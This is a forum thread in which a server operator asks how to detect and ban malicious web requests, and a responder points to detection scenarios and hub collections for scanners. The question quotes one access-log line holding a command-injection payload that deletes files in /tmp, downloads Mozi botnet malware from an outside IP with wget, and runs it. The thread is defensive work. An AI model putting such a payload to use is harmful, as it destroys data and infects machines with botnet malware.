Scenario to detect execution of malicious shell code

First of all, I don’t know how this type of attack/attempt is called, but I sometimes get requests like the following:

221.1.173.68 - - [09/Feb/2022:06:04:09 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://221.1.173.68:35656/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 19 "-" "Hello, world" 47344 "-" "-" 0ms

Is there a scenario available to identify and ban those kinds of requests? Currently, I have a matching regex in fail2ban targeted at this.

Also, is it possible to indentify and ban IPs which just scan for services? E.g. I don’t run wordpress or PHP, so every request for wp-login.php or phpmyadmin is logged with a 404. I see that this cannot be generalized, since a lot of people offer these kind of services, but is it possible to just trigger this on my machine?

Thanks for your help!

Hi

There is no scenario matching that specific attack. But there are others that looks for attempts to get a shell, like this. It’s quite trivial to write a scenario that would match what you see in your log. We have an article on that (among other things) here.

The solution to your last question lies also in scenarios For instance you can install all wordpress scenarios from the hub. All installed scenarios matches an attack you want to detect. And you don’t have to actually have the service installed as long as you have relevant logfiles - which you would on all http-based attacks. So installing this would also be a good idea since it’s actually made for that purpose

thanks for your answer! I just installed the http-cve scenarios, thanks for the hint! I will look into writing my own scenario eventually, but have to find some time first